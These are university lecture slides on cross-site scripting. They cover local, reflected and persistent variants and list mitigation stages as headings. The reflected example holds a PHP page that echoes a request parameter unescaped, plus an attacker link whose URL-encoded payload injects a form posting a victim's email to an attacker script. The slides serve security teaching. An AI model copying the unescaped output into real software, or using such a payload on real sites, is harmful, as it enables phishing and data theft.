JMU
Cross Site Scripting (XSS)
Vulnerabilities, Attacks, and Mitigations


Prof. David Bernstein
James Madison University

Computer Science Department
bernstdh@jmu.edu


Overview
Phases
Variants of the Vulnerability
Type 0/Local Vulnerabilities

The "Classic" Case - http:// Request to a Server

images/cross-site-scripting_local_http.gif
Type 0/Local Vulnerabilities (cont.)

The "Modern" (e.g., Desktop Widgets, Gadgets, Desklets) Case - file:// Request to the Local File System

images/cross-site-scripting_local_file.gif
Type 0/Local Vulnerabilities (cont.)
A Type 0 Example
Type 1/Reflected Vulnerabilities
images/cross-site-scripting_reflected.gif
Type 1/Local Vulnerabilities (cont.)
A Type 1 Example
A Type 1 Example (cont.)

The Code on the Trusted Server Click here for a demonstration.

phpexamples/xss/trusted/create.html
        <html>
  <body>
    <form action="preview.php" method="GET" name="feedback">
    Enter your message:<br/>
    <textarea name="message" rows="10" cols="80">
    </textarea><br/>
    <input type="submit" value="Preview" />
    </form>
  </body>
</html>
        
<html>
  <body>
    <p>
    A preview of your message:
    </p>

    <p style="border: 1px solid black">
    <script language="php">
    echo $_GET["message"];
    </script>
    </p>
  </body>
</html>  
  
A Type 1 Example (cont.)

The Trigger Document Containing Malicious Code Click here for a demonstration.

phpexamples/xss/attacker/link-attack.html
        <html>
  <body>
  <p>
  Click on the following link to send a quick email to a friend.
  </p>
  <a href="../trusted/preview.php?message=Call Me!%3C%2Fp%3E%3Cp%3E%3Cform%20action%3D'..%2Fattacker%2Freceive_secret.php'%20method%3D'POST'%3EEMAIL%20of%20Recipient%3A%20%3Cinput%20type%3D'email' %20name%3D'email'%20%2F%3E%3Cbr%2F%3E%3Cinput%20type%3D'submit'%20value%3D'Send'%20%2F%3E%3C%2Fform%3E">Send</a>
  </body>
</html>
        
Type 2/Persistent Vulnerabilities
Type 2/Persistent Vulnerabilities (cont.)
Type 2/Persistent Vulnerabilities (cont.)
images/cross-site-scripting_persistent.gif
Payload of the Trigger Document
Kinds of Malicious Code
The Location of the Code in the "Dynamic" Document
Obviousness of the Malicious Code in User-Initiated GET Requests
Mitigation During Design
Mitigation During Implementation
Mitigation During Validation/Verification
Mitigation During Deployment